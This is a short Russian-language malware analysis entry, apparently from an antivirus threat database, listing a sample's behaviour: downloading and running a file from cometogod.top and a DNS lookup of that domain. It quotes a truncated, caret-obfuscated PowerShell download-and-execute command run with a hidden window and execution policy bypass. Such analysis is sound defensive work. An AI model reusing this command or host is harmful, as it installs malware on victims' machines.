Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://cometogod.top/search.php как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "po^w^Ershe^l^L.eX^e ^-^ex^EcuTIOn^p^oL^Ic^Y ^b^Yp^As^S ^-n^op^RO^F^iL^e -W^I^N^dO^wS^Ty^le^ hi^dDEN^ (new^-^objeCt^ sy^stEm^.n^et.^wEbCL^IEnt)^.^DO^wN^lOadf^il^e^(^'http://cometogod.to...
Сетевая активность
UDP
- DNS ASK co###ogod.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "po^w^Ershe^l^L.eX^e ^-^ex^EcuTIOn^p^oL^Ic^Y ^b^Yp^As^S ^-n^op^RO^F^iL^e -W^I^N^dO^wS^Ty^le^ hi^dDEN^ (new^-^objeCt^ sy^stEm^.n^et.^wEbCL^IEnt)^.^DO^wN^lOadf^il^e^(^'http://cometogod.to...' (со скрытым окном)
